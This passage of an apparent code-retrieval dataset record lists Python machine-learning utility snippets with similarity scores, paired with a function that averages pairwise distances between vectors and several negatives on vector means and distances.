write_features(self):\n num_features_per_file = math.ceil(len(self.features) / self.num_jobs)\n for idx in range(self.num_jobs):\n job_features = self.features[idx * num_features_per_file: (idx + 1) * num_features_per_file]\n features_filename = constants.INPUT_FEATURES_FILENAME.format(self.args.output_dir, idx)\n with open(features_filename, \"wb\") as features_file:\n cloudpickle.dump(job_features, features_file, protocol=pickle.DEFAULT_PROTOCOL)", "def predict(model, features):\n result = model.predict(features)\n return result", "def save_vector(dataset, outpath, driver=None):\n try:\n if not driver:\n driver = dataset.GetDriver()\n if os.path.exists(outpath):\n driver.DeleteDataSource(outpath)\n dst_ds = driver.CopyDataSource(dataset, outpath)\n else:\n driver = ogr.GetDriverByName(driver)\n if os.path.exists(outpath):\n driver.DeleteDataSource(outpath)\n dst_ds = driver.CopyDataSource(dataset, outpath)\n\n\n except RuntimeError as err:\n raise err\n except Exception as e:\n raise e\n\n finally:\n dst_ds = None # Flush the dataset to disk", "def save_model(self):\n pickle.dump(self, open(\"Logistic_Regression_Model.pkl\", \"wb\"))", "def save(model, filename):\n print(\"... 
saving model in {}\".format(filename))\n f = open(filename, \"wb\")\n pickle.dump(model, f)\n f.close()", "def test():\n # load dataset and model\n X, observed_y = load_data('../data/dev.txt')\n\n model = pickle.load(open('test.model', 'rb'))\n model.traverse()\n\n # predict labels for dataset\n preds = model.predict(X)\n\n # print(preds)\n # output model predictions\n np.savetxt('test.predictions', preds, fmt='%s')", "def run(self, dataset_path):\n features = self._generate_features(self._feature_extractors)\n features.to_csv(dataset_path)", "def load_model_and_create_submission_file(model_save_path, csv_path, threshold=0.25):\n model = load_model(model_save_path)\n imgs = datatools.load_test_images('data/test_set_images/')\n predict_imgs = [predict_test_img(img, model) for img in imgs]\n create_csv(predict_imgs, csv_path, threshold)", "def save_features(videos, net, transformer):\n n_features = 4096\n name = 'baseline'\n for video in videos:\n X = np.empty((0, n_features))\n y = np.empty(0)\n print '[INFO] processing video %d / %d' % (videos.index(video) + 1, len(videos))\n for reverse in [False, True]:\n for flip in [False, True]:\n if (is_forward(video) and (not reverse)) or ((not is_forward(video)) and reverse):\n direction = 'f'\n else:\n direction = 'b'\n flows = load_video(video, './data/ArrowDataAll/', mask = lambda x: x[:3] == 'of' + direction, grayscale = True, flip = flip, reverse = reverse)\n sel = np.asarray([[2*i, 2*i+1] for i in select(flows, 1)]).flatten()\n flows = np.take(flows, sel, axis = 0)\n imgs = []\n for i in range(len(flows)/2):\n _, ang = cv2.cartToPolar(np.asarray(flows[0], dtype = np.float32), np.asarray(flows[1], dtype = np.float32))\n image = np.stack([flows[0], flows[1], cv2.normalize(ang,None,0,255,cv2.NORM_MINMAX)], axis = -1)\n imgs.append(image)\n imgs = map(lambda x: transformer.preprocess('data', x), imgs)\n net.blobs['data'].data[...] 
= imgs\n net.forward()\n X = np.append(X, net.blobs['fc7'].data, axis = 0)\n if direction == 'f':\n y = np.append(y, 1)\n else:\n y = np.append(y, 0)\n with open(os.path.join('./data/ArrowDataAll', video, 'features-' + name + '.csv'), 'w') as f:\n np.savetxt(f, X, delimiter = ',', fmt = '%f')\n with open(os.path.join('./data/ArrowDataAll', video, 'labels-' + name + '.csv'), 'w') as f:\n np.savetxt(f, y, delimiter = ',', fmt = '%d')", "def write_features_to_file(filename,locs,desc):\n savetxt(filename, hstack((locs, desc)))", "def predict(model, dataset_info, args):\n dataset_info, model_info = fill_info_dicts(dataset_info, args)\n\n fill_pred_op_info(dataset_info, model, args, model_info)\n # fill_topic_op(args, model_info)\n\n str_ = 'Predictions of the given text data of dataset %s using different ' \\\n 'saved models:' % args.predict_dataset\n labels = [str(i) for i in dataset_info[args.predict_dataset]['labels']]\n if len(labels) == 2 or args.task == 'regression':\n # TODO currently just hard code for binary\n header = 'id\\tlabel\\t' + str(1) + '\\n'\n else:\n header = 'id\\tlabel\\t' + '\\t'.join(labels) + '\\n'\n\n saver = tf.train.Saver(max_to_keep=100)\n\n model_names = args.datasets\n if len(args.datasets) > 1:\n model_names.append('MULT')\n\n for model_name in model_names:\n # load the saved best model\n str_ += '\\nUsing the model that performs the best on (%s)\\n' % model_name\n\n output = header\n str_ += header\n\n data = []\n\n with tf.Session() as sess:\n if model_name == 'MULT':\n checkpoint_path = os.path.join(args.checkpoint_dir, 'MULT',\n 'model')\n else:\n checkpoint_path = model_info[model_name]['checkpoint_path']\n\n saver.restore(sess, checkpoint_path)\n\n dataset_name = args.predict_dataset\n\n # import pdb\n # sess.run(model_info[dataset_name]['pred_iter'].initializer)\n # batch = model_info[dataset_name]['pred_batch']\n # text, weights = sess.run([batch['text'], batch['text_weights']])\n # pdb.set_trace()\n\n _pred_op = model_info[dataset_name]['pred_pred_op']\n _pred_iter = model_info[dataset_name]['pred_iter']\n _ids, _predictions, _scores = get_all_pred_res(sess, _pred_op,\n _pred_iter, args)\n\n for id, pred, score in zip(_ids, _predictions, _scores):\n record = {\n 'id': id,\n 'label': pred\n }\n if args.task == 'classification':\n for l, s in zip(labels, score):\n record[str(l)] = s\n else:\n record['score'] = score[0]\n data.append(record)\n\n # output positive score for binary classification\n\n if len(score) == 2:\n score = str(score[1])\n else:\n score = '\\t'.join([str(i) for i in score])\n str_ += id + '\\t' + str(int(pred)) + '\\t' + score + '\\n'\n output += id + '\\t' + str(int(pred)) + '\\t' + score + '\\n'\n\n make_dir(args.predict_output_folder)\n\n with open(\n os.path.join(args.predict_output_folder, model_name) + '.tsv',\n 'w') as file:\n # for i in _predictions:\n # file.write(str(i))\n file.write(output)\n\n with open(\n os.path.join(args.predict_output_folder, model_name) + '.json',\n 'wt') as file:\n json.dump(data, file, ensure_ascii=False)\n\n logging.info(str_)", "def postprocess_output(\n self,\n init_net: core.Net,\n predict_net: core.Net,\n workspace: core.workspace,\n output_names: List[str],\n py_model,\n ):\n model_out = py_model(*self.dummy_model_input)\n res = py_model.output_layer.export_to_caffe2(\n workspace, init_net, predict_net, model_out, *output_names\n )\n\n # optionally include the last decoder layer of pytorch model\n final_output_names = [str(output) for output in res] + (\n output_names if 
self.config.export_logits else []\n )\n\n return res, final_output_names", "def save_model(model, filename):\n with open(filename, 'wb') as f:\n joblib.dump(model, f)", "def dump_model(model,\n dataset=None,\n output_dir='./dump_results',\n dump_float=False,\n weights_only=False,\n **kwargs):\n if model_utils.is_tf_graphdef(model):\n from tensorflow_model_optimization.python.core.quantization.keras.vitis import (\n vitis_quantize_pb)\n return vitis_quantize_pb.PBQuantizer(model).dump_model(output_dir=output_dir,\n dump_float=dump_float, **kwargs)\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n if not weights_only and dataset is None:\n logger.error('`dataset` is needed to dump with activation.')\n\n logger.info(\"Start Dumping...\")\n model_utils.dump_model_weights(model, dump_float, output_dir)\n if not weights_only:\n model_utils.dump_model_activations(model, dataset, dump_float, output_dir)", "def predict(self):\n train_vec, test_vec = self.get_tfidf_vectors()\n clf = self.get_classifier()\n\n print '-'*40\n print 'Making predictions ...'\n clf.fit(train_vec, self.train_ans)\n clf_predictions = clf.predict_proba(test_vec)\n\n print 'Storing predictions in', self.pred_file\n pred_out = [\"Id,predictions\"]\n num_pred = range(30)\n for fid, pred in zip(self.test_index, clf_predictions):\n top_rec = sorted(num_pred, key=lambda k: pred[k], reverse=True)[:3]\n pred_out.append(\"%s,%s\" % (fid, ' '.join( [clf.classes_[rec] for rec in top_rec] )))\n with open(self.pred_file, 'w') as f:\n f.write('%s\\n' % ('\\n'.join(pred_out)))", "def dump_processed_data_to_file(self, facts, accu_label, article_label, imprison_label):\r\n data = [facts, accu_label, article_label, imprison_label]\r\n with open(util.MID_DATA_PKL_FILE_LOC, \"wb\") as f:\r\n pickle.dump(data, f)\r\n if util.DEBUG:\r\n print(\"DEBUG: data dumped to `.pkl` file\")", "def write_label_answer(vec, outfile):\n\n if(vec.shape[0] != 70):\n print(\"Error - output vector should have 70 rows.\")\n print(\"Aborting write.\")\n return\n\n for v in vec:\n if((v != -1.0) and (v != 1.0)):\n print(\"Invalid value in input vector.\")\n print(\"Aborting write.\")\n return\n\n np.savetxt(outfile, vec)", "def predict_all(model_file, input_file):\n # Reading a model file\n w = {}\n for line in open(model_file):\n line = line.strip()\n (name, value) = line.split(\"\\t\")\n value = float(value)\n w[name] = value\n\n # Evaluation and print results\n for line in open(input_file):\n line = line.strip()\n phi = create_features(line)\n y_ = predict_one(w, phi)\n\n print y_", "def export_to_caffe2(\n self, model, export_path: str, export_onnx_path: str = None\n ) -> List[str]:\n\n print(f\"Saving caffe2 model to: {export_path}\")\n\n c2_prepared = onnx.pytorch_to_caffe2(\n model,\n self.dummy_model_input,\n self.input_names,\n self.output_names,\n export_path,\n export_onnx_path,\n )\n c2_prepared, final_input_names = self.prepend_operators(\n c2_prepared, self.input_names\n )\n\n # Required because of https://github.com/pytorch/pytorch/pull/6456/files\n with c2_prepared.workspace._ctx:\n predict_net = core.Net(c2_prepared.predict_net)\n init_net = core.Net(c2_prepared.init_net)\n\n net_outputs, final_out_names = self.postprocess_output(\n init_net, predict_net, c2_prepared.workspace, self.output_names, model\n )\n for output in net_outputs:\n predict_net.AddExternalOutput(output)\n c2_prepared.predict_net = predict_net.Proto()\n c2_prepared.init_net = init_net.Proto()\n\n # Save predictor net to file\n 
onnx.export_nets_to_predictor_file(\n c2_prepared,\n final_input_names,\n final_out_names,\n export_path,\n self.get_extra_params(),\n )\n return final_out_names", "def data_word2vec_one_label(input_file,\n word2vec_model):\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n\n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n\n\n with open(input_file) as fin:\n raw_tokens_list_gov = []\n raw_tokens_list_art = []\n test_id_list = []\n content_index_list_gov = []\n content_index_list_art = []\n # labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n\n for each_line in fin:\n data = json.loads(each_line)\n ds_art = data['testid']\n ds = ds_art.split(\"_\")[0]\n art = ds_art.split(\"_\")[1][1:-1]\n test_id = ds + \"_\" + art\n features_content_gov = data['gov']\n features_content_art = data['art']\n label = data['label']\n\n test_id_list.append(test_id)\n content_index_list_gov.append(_token_to_index(\n features_content_gov))\n content_index_list_art.append(_token_to_index(\n features_content_art))\n\n raw_tokens_list_gov.append(features_content_gov)\n raw_tokens_list_art.append(features_content_art)\n\n # labels_list.append(label)\n # onehot_labels_list.append(_create_onehot_labels(labels_index,\n # num_labels))\n onehot_labels_list.append(label)\n labels_num = 1\n labels_num_list.append(labels_num)\n total_line += 1\n\n\n class _Data:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return total_line\n\n @property\n def testid(self):\n return test_id_list\n\n @property\n def raw_tokens_gov(self):\n return raw_tokens_list_gov\n\n @property\n def raw_tokens_art(self):\n return raw_tokens_list_art\n\n @property\n def tokenindex_gov(self):\n return content_index_list_gov\n\n @property\n def tokenindex_art(self):\n return content_index_list_art\n\n # @property\n # def labels(self):\n # return labels_list\n\n @property\n def onehot_labels(self):\n return onehot_labels_list\n\n @property\n def labels_num(self):\n return labels_num_list\n\n return _Data()", "def export(self, outpath):\n fout = open(outpath, \"w\")\n\n # Header takes the guesswork out of loading by recording how many lines, vector dims\n fout.write(str(self.n_words) + \" \" + str(self.n_dim) + \"\\n\")\n for token in self.id2word:\n vector_components = [\"%.6f\" % number for number in self[token]]\n vector_as_string = \" \".join(vector_components)\n\n out_line = token + \" \" + vector_as_string + \"\\n\"\n fout.write(out_line)\n\n fout.close()", "def save_forward_pass_feature(self):\n import iutils as iu\n import scipy.io as sio\n testdp = self.test_data_provider\n num_batches = len(testdp.batch_range)\n print 'There are ' + str(testdp.get_num_batches(self.data_path)) + ' in directory'\n print 'There are ' + str( num_batches ) + ' in range'\n iu.ensure_dir(self.save_feature_path)\n feature_name = self.op.get_value('save_feature_name')\n feature_dim = self.model_state['layers'][self.feature_idx]['outputs']\n for b in range(num_batches):\n epoch, b_num, data = self.get_next_batch(train=False)\n print ' Start writing batch......\\t' + str(b_num)\n num_data = data[0].shape[-1]\n data += [n.zeros((num_data, feature_dim), dtype=n.single)]\n save_name = 'data_batch_' + str(b_num)\n save_path = iu.fullfile(self.save_feature_path, save_name)\n self.libmodel.startFeatureWriter(data, self.feature_idx)\n self.finish_batch()\n d = 
testdp.data_dic.copy()\n d['feature'] = data[-1].transpose()\n d['joints8'] = d['joints8'] * testdp.img_size\n del d['data']\n print 'The shape of feature is' + str(d['feature'].shape)\n pickle(save_path, d)\n sio.savemat(save_path, d)", "def __convert_labeled_featuresets(self, labeled_featuresets, output):\n\n\t\tif isinstance(output, str):\n\t\t\toutput = open(output,'w')\n\t\telif not isinstance(output, file):\n\t\t\traise TypeError('output is a str or a file.')\n\n\t\tfor featureset, label in labeled_featuresets:\n\t\t\tfeat, label = self.__text_converter.toSVM(\" \".join(featureset), label)\n\t\t\tfeat = ''.join(' {0}:{1}'.format(f,feat[f]) for f in sorted(feat))\n\t\t\tif label == None:\n\t\t\t\tlabel = -1\n\t\t\toutput.write(str(label) + ' ' + feat + '\\n')\n\t\toutput.close()", "def SaveDecoderAndData(clf, X, X_not_scaled, y, subjID):\n time_to_save = datetime.datetime.now().isoformat()\n time_to_save = time_to_save.replace('T','-')\n time_to_save = time_to_save.replace(':','-')\n \n model = clf\n model_file = 'Models/' + subjID + '_MI_classifier_' + time_to_save[:19] + '.sav'\n pickle.dump(model, open(model_file, 'wb'))\n \n filepath_export_data = 'Models/' + subjID + '_data_for_MI_classifier_' + time_to_save[:19] + '.npz'\n np.savez_compressed(filepath_export_data, subjID=subjID, X=X, X_not_scaled=X_not_scaled, y=y)", "def review_to_vec(words, model, num_features , index2word_set):\n \n feature_vec = np.zeros((num_features), dtype=\"float32\")\n word_count = 0\n \n \n \n for word in words:\n if word in index2word_set: \n word_count += 1\n feature_vec += model[word]\n\n if word_count == 0:\n word_count = 1\n\n feature_vec /= word_count\n\n return feature_vec", "def write_predictions(y_pred, filename, yname=None) :\n out = open(filename, 'wb')\n f = csv.writer(out)\n if yname :\n f.writerow([yname])\n f.writerows(zip(y_pred))\n out.close()", "def file_based_convert_examples_to_features(\n examples, label_list, output_mode, max_seq_length, max_predictions_per_seq, tokenizer, output_file):\n\n writer = tf.python_io.TFRecordWriter(output_file)\n\n for (ex_index, example) in enumerate(examples):\n if ex_index % 10000 == 0:\n tf.logging.info(\"Writing example %d of %d\" % (ex_index, len(examples)))\n\n feature = convert_single_example(ex_index, example, label_list, output_mode,\n max_seq_length, max_predictions_per_seq, tokenizer)\n\n def create_int_feature(values):\n f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n return f\n\n def create_float_feature(values):\n f = tf.train.Feature(float_list=tf.train.FloatList(value=list(values)))\n return f\n\n\n features = collections.OrderedDict()\n features[\"input_ids\"] = create_int_feature(feature.input_ids)\n features[\"input_mask\"] = create_int_feature(feature.input_mask)\n features[\"segment_ids\"] = create_int_feature(feature.segment_ids)\n features[\"masked_lm_positions\"] = create_int_feature(feature.masked_lm_positions)\n features[\"masked_lm_ids\"] = create_int_feature(feature.masked_lm_ids)\n features[\"masked_lm_weights\"] = create_float_feature(feature.masked_lm_weights)\n if output_mode == 'classification':\n features[\"label_ids\"] = create_int_feature([feature.label_id])\n elif output_mode == 'regression':\n features[\"label_ids\"] = create_float_feature([feature.label_id])\n else:\n raise KeyError(mode)\n features[\"is_real_example\"] = create_int_feature(\n [int(feature.is_real_example)])\n\n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n 
writer.write(tf_example.SerializeToString())\n writer.close()", "def create_and_save_model(datapath, test_percentage = 0.2):\r\n \r\n pick_in = open(datapath, \"rb\")\r\n data = pickle.load(pick_in)\r\n pick_in.close()\r\n pick_parameter = open('parameters.data', \"rb\")\r\n parameters = pickle.load(pick_parameter)\r\n pick_parameter.close()\r\n #random.shuffle(keys)\r\n #shuffled_data = [(key, data[key]) for key in keys]\r\n \r\n features = []\r\n labels = []\r\n \r\n # sift/surf return dictonary, while hog returns list\r\n # convert both in same format\r\n if type(data) == dict:\r\n farray = []\r\n for label, label_features in data.items():\r\n for feature in label_features:\r\n farray.append([feature, label])\r\n data = farray\r\n \r\n random.shuffle(data)\r\n\r\n for feature, label in data:\r\n features.append(feature)\r\n labels.append(label)\r\n \r\n \r\n \r\n xtrain, xtest, ytrain, ytest = train_test_split(features, labels, test_size=test_percentage)\r\n \r\n # unpack parameters\r\n model = SVC(**parameters)\r\n model.fit(xtrain, ytrain)\r\n \r\n pick = open('model.data', \"wb\") #save model\r\n pickle.dump(model, pick)\r\n pick.close()\r\n\r\n test_data = list(zip(xtest,ytest))\r\n\r\n pick1 = open('data_test.data', \"wb\") #save test data, so that we don't mix up training and test data\r\n pickle.dump(test_data, pick1)\r\n pick1.close()\r\n\r\n print(\"n_test: \", len(xtest))\r\n print(\"n_train: \", len(xtrain))", "def save_word2vec_format(self, fname, doctag_vec=False, word_vec=True, prefix='*dt_', fvocab=None, binary=False):\n total_vec = len(self.wv.vocab) + len(self.docvecs)\n write_first_line = False\n # save word vectors\n if word_vec:\n if not doctag_vec:\n total_vec = len(self.wv.vocab)\n self.wv.save_word2vec_format(fname, fvocab, binary, total_vec)\n # save document vectors\n if doctag_vec:\n if not word_vec:\n total_vec = len(self.docvecs)\n write_first_line = True\n self.docvecs.save_word2vec_format(\n fname, prefix=prefix, fvocab=fvocab, total_vec=total_vec,\n binary=binary, write_first_line=write_first_line)", "def write_metadata(filename, labels):\n with open(filename, 'w') as f:\n f.write(\"Index\\tLabel\\n\")\n for index, label in enumerate(labels):\n f.write(\"{}\\t{}\\n\".format(index, label))\n\n print('Metadata file saved in {}'.format(filename))\n return True\n\n\n \"\"\"\n Helper functions for sampled attack\n and ellipse attack\n \"\"\"\n\n def calc_X_featurized_star(sess, model, y_train, x_train, num_samples_perturb, num_samples_ellipse, display_step = 1):\n A_list = []\n b_list = []\n x_featurized_star = []\n for (idx, x_i) in enumerate(x_train):\n if idx % display_step == 0:\n print(\"Training point number %d\" % idx)\n perturbed_x_i = random_perturbation(x_i, eps = eps_train, num_samples = num_samples_perturb)\n featurized_perturbed_x = model.get_activation(sess, perturbed_x_i)[-2]\n A_i, b_i = learn_constraint_setV2(featurized_perturbed_x)\n A_list.append(A_i)\n b_list.append(b_i)\n x_i_star = solve_inner_opt_problem(sess, model, y_train[idx], num_samples_ellipse, A_i, b_i)\n x_featurized_star.append(x_i_star)\n return np.array(x_featurized_star)", "def dump_model(model, filename):\n import pickle\n logging.info(\"Dumping model into model.pkl\")\n with open(filename, 'w') as dump_file:\n pickle.dump(model, dump_file)", "def _run_labelled_extraction(self, dataset_type: DatasetType, device: str) -> None:\n dataset = self.image_datasets.get_dataset(dataset_type)\n self.extractor_model = self.extractor_model.to(device)\n\n filenames = []\n labels = []\n 
for i in tqdm(\n range(len(dataset)), desc=\"Extracting features - \" + dataset_type.name\n ):\n image, image_label, filename = dataset.getitem_filename(i)\n # Extract tensor and save\n feature_tensor = self.extractor_model(image.unsqueeze(0).to(device))\n self._save_tensor(dataset_type, feature_tensor, filename)\n filenames.append(filename)\n labels.append(image_label)\n\n # Save labels file\n labels_filepath = self.get_labels_filepath(dataset_type)\n with open(labels_filepath, \"w+\") as file:\n csv_writer = csv.writer(file)\n for filename, label in zip(filenames, labels):\n csv_writer.writerow([filename, label])", "def save_model(model, model_filepath, protocol=0):\n # using pickle to store trained classifier\n #pickle.dump(model,open(model_filepath,'wb'))\n \n file = gzip.GzipFile(model_filepath, 'wb')\n file.write(pickle.dumps(model, protocol))\n file.close()\n \n pass", "def WriteSrnModelToFile(filename, model):\n\n # Write the .hpp file\n WriteHeaderFileForSrnModel(filename, model)\n\n # Write the .cpp fil\n WriteSourceFileForSrnModel(filename, model)", "def get_feature_0(data_points:np.array, save_name = ''):\n def pair_d(M):\n # extract the upper triangle of the pairwise distance matrix\n # upper_tri() in functions.py\n d = [upper_tri(pairwise_distances(M[:,i].reshape(-1,1))) for i in range(M.shape[1])]\n # Unlist the list and convert it to an array \n vec = np.array(list(chain.from_iterable(d))).reshape(-1,1)\n return vec\n \n start = time.time()\n # apply pairwise function to all samples \n d = [pair_d(data_points[i]) for i in range(data_points.shape[0])]\n feature0 = np.array(d).reshape(data_points.shape[0],-1)\n tm = round(time.time()-start,4)\n \n if save_name != '':\n np.savetxt(fname = output_dir + save_name + '.csv', X=feature0, delimiter=',')\n #print(\"-----Feature set 0 shape:\", feature0.shape)\n return(feature0, tm)", "def create_Tf_matrix(\n corpus,\n filename_npz=\"../data/tfidf/data_tf.npz\",\n filename_features=\"../data/tfidf/data_feature_names.pkl\",\n):\n\n vectorizer = CountVectorizer(max_features=len(corpus))\n X = vectorizer.fit_transform(corpus)\n print(\"-Vectorized matrix, \", X.toarray().shape)\n print(\" first line:\")\n print(X.toarray()[0])\n print(\"- Nombre de features :\" + str(len(vectorizer.get_feature_names())))\n print(vectorizer.get_feature_names()[0:10], \" ...\")\n\n data = pd.DataFrame(vectorizer.get_feature_names())\n data.to_pickle(filename_features)\n print(\"tf feature names - saved\")\n sparse.save_npz(filename_npz, X)\n print(\"tf matrix:\", filename_npz, \" - saved\")", "def feature_vecs_DOC(train_pos, train_neg, test_pos, test_neg):\n # Doc2Vec requires LabeledSentence objects as input.\n # Turn the datasets from lists of words to lists of LabeledSentence objects.\n # YOUR CODE HERE\n labeled_train_pos = []\n labeled_train_neg = []\n labeled_test_pos = []\n labeled_test_neg = []\n i = 0\n for line in train_pos:\n labeled_train_pos.append(LabeledSentence(line, ['TRAIN_POS_%i' % i]))\n i += 1\n i = 0\n for line in train_neg:\n labeled_train_neg.append(LabeledSentence(line, ['TRAIN_NEG_%i' % i]))\n i += 1\n i = 0\n for line in test_pos:\n labeled_test_pos.append(LabeledSentence(line, ['TEST_POS_%i' % i]))\n i += 1\n i = 0\n for line in test_neg:\n labeled_test_neg.append(LabeledSentence(line, ['TEST_NEG_%i' % i]))\n i += 1\n\n # Initialize model\n model = Doc2Vec(min_count=1, window=10, size=100, sample=1e-4, negative=5, workers=4)\n sentences = labeled_train_pos + labeled_train_neg + labeled_test_pos + labeled_test_neg\n 
model.build_vocab(sentences)\n\n # Train the model\n # This may take a bit to run \n for i in range(5):\n print \"Training iteration %d\" % (i)\n random.shuffle(sentences)\n model.train(sentences)\n\n # Use the docvecs function to extract the feature vectors for the training and test data\n # YOUR CODE HERE\n train_pos_vec = []\n train_neg_vec = []\n test_pos_vec = []\n test_neg_vec = []\n for j in range(len(train_pos)):\n train_pos_vec.append(model.docvecs['TRAIN_POS_%i' % j])\n for j in range(len(train_neg)):\n train_neg_vec.append(model.docvecs['TRAIN_NEG_%i' % j])\n for j in range(len(test_pos)):\n test_pos_vec.append(model.docvecs['TEST_POS_%i' % j])\n for j in range(len(test_neg)):\n test_neg_vec.append(model.docvecs['TEST_NEG_%i' % j])\n\n # Return the four feature vectors\n return train_pos_vec, train_neg_vec, test_pos_vec, test_neg_vec", "def save2file(self):\n ids_input = []\n labels_input = []\n ids_path = os.path.join(self.path, 'ids')\n if not os.path.exists(ids_path):\n os.makedirs(ids_path)\n labels_path = os.path.join(self.path, 'labels')\n if not os.path.exists(labels_path):\n os.makedirs(labels_path)\n ids_total = len(self.test)\n for i in range(ids_total):\n ids_input = self.test[i][0]\n labels_input = self.test[i][1]\n file_name = \"ids/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(ids_input, dtype=np.int32).tofile(file_path)\n file_name = \"labels/\" + str(i) + \".bin\"\n file_path = os.path.join(self.path, file_name)\n np.array(labels_input, dtype=np.int32).tofile(file_path)\n print(\"\\n ****** Success! ******\\n \")", "def makeFeatureVec(words, model, num_features):\n\t# Initialize an empty numpy array (for speed) \n\tfeatureVec = np.zeros((num_features,), dtype=\"float32\")\n\t# Initialize a counter (number of words)\n\tnwords = 0.\n\t \n\t# Index2word is a list that contains the names of the words in the model's vocabulary. \n\tindex2word_set = set(model.index2word)\n\t# \n\t# Loop over each word in the review and, if it is in the model's vocaublary, add \n\t# its feature vector to the total \n\tfor word in words:\n\t\tif word in index2word_set:\n\t\t\tnwords = nwords + 1.\n\t\t\tfeatureVec = np.add(featureVec,model[word])\n\t# \n\t# Divide the result by the number of words to get the average \n\tfeatureVec = np.divide(featureVec,nwords)\n\treturn featureVec", "def save_features_predictors(X,y):\n pwd = \"./data/\"\n if __name__ == \"__main__\":\n pwd = \".\" + pwd\n else:\n pass\n\n fn1 = os.path.join(pwd, \"features.npy\")\n fn2 = os.path.join(pwd, \"predictors.npy\")\n exists1 = os.path.isfile(fn1)\n exists2 = os.path.isfile(fn2)\n if exists1 and exists2:\n inp = input(\"Would you like to overwrite previous data?(y/n)\")\n if str(inp) == \"y\" or str(inp) == \"Y\":\n np.save(fn1, X)\n np.save(fn2, y)\n print(f\"Features X and outcomes y overwritten in files {fn1}\" +\n f\" and {fn2}.\")\n else:\n print(\"Data not overwritten.\")\n else:\n np.save(fn1, X)\n np.save(fn2, y)\n print(f\"Features X and outcomes y saved in files {fn1} and {fn2}.\")" ]
[ "0.6803554", "0.6240717", "0.6221068", "0.6063516", "0.6009722", "0.5950848", "0.5824239", "0.58020353", "0.57663727", "0.57563233", "0.5755955", "0.57133436", "0.5701105", "0.5675284", "0.56728137", "0.56672686", "0.56518734", "0.56423616", "0.56261265", "0.56195384", "0.56093127", "0.559749", "0.55943036", "0.5589769", "0.55883914", "0.55862075", "0.5547711", "0.5543332", "0.5540957", "0.5536413", "0.55287206", "0.552623", "0.5522566", "0.55219656", "0.5515857", "0.5507746", "0.54650295", "0.5463799", "0.5449943", "0.54439616", "0.5439938", "0.54175425", "0.5387174", "0.5380249", "0.5363178", "0.5362834", "0.53576255", "0.5356762", "0.5350925", "0.5349875", "0.53480417", "0.5347965", "0.53462857", "0.53360176", "0.5335901", "0.5323942", "0.53096104", "0.5284966", "0.5274741", "0.52723", "0.5249406", "0.52482814", "0.5241681", "0.5241554", "0.52331334", "0.52268314", "0.5225022", "0.5222772", "0.5222407", "0.5220686", "0.5213464", "0.52105373", "0.5210335", "0.5206063", "0.520441", "0.51970595", "0.51885325", "0.5184893", "0.5178633", "0.51774395", "0.51754016", "0.5174482", "0.5173046", "0.515685", "0.5154181", "0.51500654", "0.5148897", "0.5147967", "0.5144746", "0.5144185", "0.51431924", "0.5139615", "0.5137513", "0.5134611", "0.5131439", "0.5131305", "0.5130189", "0.513016", "0.5127436", "0.51192015" ]
0.6868015
0
Returns the average distance between pairs of vectors in a given list of vectors.
def average_distance_between_vectors(vectors, distance):
    vectors = numpy.array(vectors)
    vectors = vectors - numpy.mean(vectors, axis=0)
    vectors = normalize(vectors)
    vectors = list(vectors)
    average_distance = utils.RunningAverage()
    for vector_1, vector_2 in itertools.combinations(vectors, r=2):  # All pairs of vectors
        average_distance.update(distance(vector_1, vector_2))
    return average_distance()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def average_vectors(vectors_list):\n return np.mean(vectors_list, axis=0)", "def compute_average(vec_list):\r\n return np.sum(vec_list, axis = 0)/len(vec_list)", "def average(cls, vectors):\n return cls.sum(vectors) / len(vectors)", "def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors: List[Vector]) -> Vector:\n n = len(vectors)\n\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1 / n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def vector_mean(vectors):\n n = len(vectors)\n return scalar_multiply(1/n, vector_sum(vectors))", "def getAveragePositionFromList( positionsList ):\n \n vectors = [ vector.makeMVector( values = [x, y, z] ) for x, y, z in positionsList ]\n \n vectorsSum = vector.makeMVector()\n \n for v in vectors:\n \n vectorsSum += v\n \n vectorsAverage = vectorsSum / len( positionsList )\n \n return [ vectorsAverage[0], vectorsAverage[1], vectorsAverage[2] ]", "def _vector_dist(self, vec1, vec2):\r\n return sqrt(sum([(float(v1) - float(v2)) ** 2 for v1, v2 in\r\n zip(vec1, vec2)]))", "def average_distance(c1, c2):\n return sum(sum(symmetric_distances[p1][p2] for p1 in c1) for p2 in c2) \\\n / (len(c1) * len(c2))", "def distance_metric(u, v):\n if len(u) != len(v):\n raise Exception(\n \"Distance metric not valid for differently sized vectors\")\n sum = 0.\n for i in range(len(u)):\n sum += ((u[i] - v[i]) ** 2)\n return math.sqrt(sum)", "def average_distance(predictions, targets):\n total_distance = 0\n for prediction, target in zip(predictions, targets):\n total_distance += Levenshtein.distance(prediction, target)\n return total_distance / len(predictions)", "def mse (vec1, vec2):\n sum = 0.0 #Initializes sum to 0\n count = len(vec1) #Number of total elements in each vector\n for i in range(count):\n sum += (vec2[i]-vec1[i])**2 #Adds the square of the difference between the values at each position in the two vectors\n return sum/count", "def euclidean_distance(vector1, vector2):\n e_dist = [(v1 - v2) ** 2 for v1, v2 in zip(vector1, vector2)]\n e_dist = math.sqrt(sum(e_dist))\n return e_dist", "def pearson_distance(vector1, vector2) :\n sum1 = sum(vector1)\n sum2 = sum(vector2)\n\n sum1Sq = sum([pow(v,2) for v in vector1])\n sum2Sq = sum([pow(v,2) for v in vector2])\n\n pSum = sum([vector1[i] * vector2[i] for i in 